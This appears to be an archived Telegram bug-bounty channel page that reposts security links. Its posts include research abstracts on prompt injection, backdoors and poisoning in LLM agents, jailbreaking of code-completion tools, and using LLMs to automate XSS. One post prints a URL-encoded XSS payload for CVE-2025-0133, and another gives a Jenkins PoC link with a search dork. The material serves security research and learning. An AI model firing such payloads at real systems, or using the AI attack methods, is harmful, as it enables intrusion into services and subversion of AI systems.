Endi mavjud! Telegram Tadqiqoti 2025 — yilning asosiy insaytlari 
Bug bounty Tips
Kanalga Telegram’da o‘tish
🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️♂️ OSINT Specialist Admin: @laazy_hack3r
Ko'proq ko'rsatish5 792
Obunachilar
+424 soatlar
+767 kunlar
+40730 kunlar
Postlar arxiv
5 798
🌘 From Prompt Injections to Protocol Exploits:Threats in LLM-Powered AI Agents Workflows, 2025.
// In this Research, we introduce the first unified, end-to-end threat model for LLM-agent ecosystems, spanning host-to-tool and agent-to-agent communications, formalize adversary capabilities and attacker objectives, and catalog over thirty attack techniques. We organized the threat model into four domains: Input Manipulation (prompt injections, long-context hijacks, multimodal adversarial inputs), Model Compromise (prompt- and parameter-level backdoors, composite and encrypted multi-backdoors, poisoning strategies), System and Privacy Attacks (speculative side-channels, membership inference, retrieval poisoning, social-engineering simulations), and Protocol Vulnerabilities (exploits in Model Context Protocol, Agent Communication Protocol, Agent Network Protocol, Agent-to-Agent protocol)
🧩 #Research #MLSecOps
5 798
🔖 Application Programming Interface (API):
Vulnerabilities and Risks", Special Report
🌘 2024
// This report describes 11 common vulnerabilities and 3 risks related to APIs, providing suggestions about how to fix or reduce their impact. Recommendations include using a standard API documentation process, using automated testing, and ensuring the security of the identity and access management system
See also:
]-> API Specification Parser
]-> Tool to detect API auth weaknesses
]-> API Security Vulnerability Scanner
🧩 #AppSec #Whitepaper
🧩 #Threat_Research
5 798
#Threat_Research
#Offensive_security
"Teaching LLMs how to XSS:
An introduction to fine-tuning and reinforcement learning (using your own GPU)", 2025.
// ways to automate XSS with LLMs as a learning exercise
5 798
#AIOps
#MLSecOps
"Security Attacks on LLM-based Code Completion Tools", v.4, AAAI 2025.
]-> example code and attack samples
// LLM-based Code Completion Tools (LCCTs) often rely on proprietary code datasets for training, raising concerns about the potential exposure of sensitive data. We exploit these distinct characteristics of LCCTs to develop targeted attack methodologies on two critical security risks: jailbreaking and training data extraction attacks
5 798
✨List of Awesome Red Team / Red Teaming Resources. This list is for anyone wishing to learn about Red Teaming but do not have a starting point.
https://github.com/0xMrNiko/Awesome-Red-Teaming
5 798
Asset inventory of over 800 public bug bounty programs.
https://github.com/trickest/inventory
5 798
🚨CVE-2025-0133 : Payload + Template
Payload:
%3Csvg%20xmlns%3D%22http%3A%2F%http://2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E
Write-up: https://codewithvamp.medium.com/cve-2025-0133-reflected-xss-vulnerability-in-palo-alto-globalprotect-gateway-portal-028128f2f5b9
Template: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-0133.yaml5 798
#Research
#MLSecOps
"Generative AI in cybersecurity:
A Comprehensive Review of LLM Applications and Vulnerabilities", 2025.
// This paper provides a comprehensive review of the future of cybersecurity through GenAI and LLMs. We explore LLM applications across various domains, including hardware design security, intrusion detection, software engineering, design verification, cyber threat intelligence, malware and phishing detection. We present an overview of LLM evolution and its current state. Our analysis extends to LLM vulnerabilities, such as prompt injection, insecure output handling, data poisoning, DDoS, and adversarial instructions
5 798
DomLoggerpp by @kevin_mizu is a simple web extension that helps you identify JavaScript DOM sinks that could lead to DOM-based vulnerabilities (such as XSS)! 😎
Check it out! 👇
🔗 https://github.com/kevin-mizu/domloggerpp
5 798
🚨 CVE-2025-53652: Jenkins Git Parameter Plugin Unvalidated Input Vulnerability
🔥PoC :https://github.com/pl4tyz/CVE-2025-53652-Jenkins-Git-Parameter-Analysis
👇Dorks
HUNTER : http://product.name="Jenkins"
📰Refer:https://jenkins.io/security/advisory/2025-07-09/#SECURITY-3419
https://github.com/advisories/GHSA-qcj2-99cg-mppf
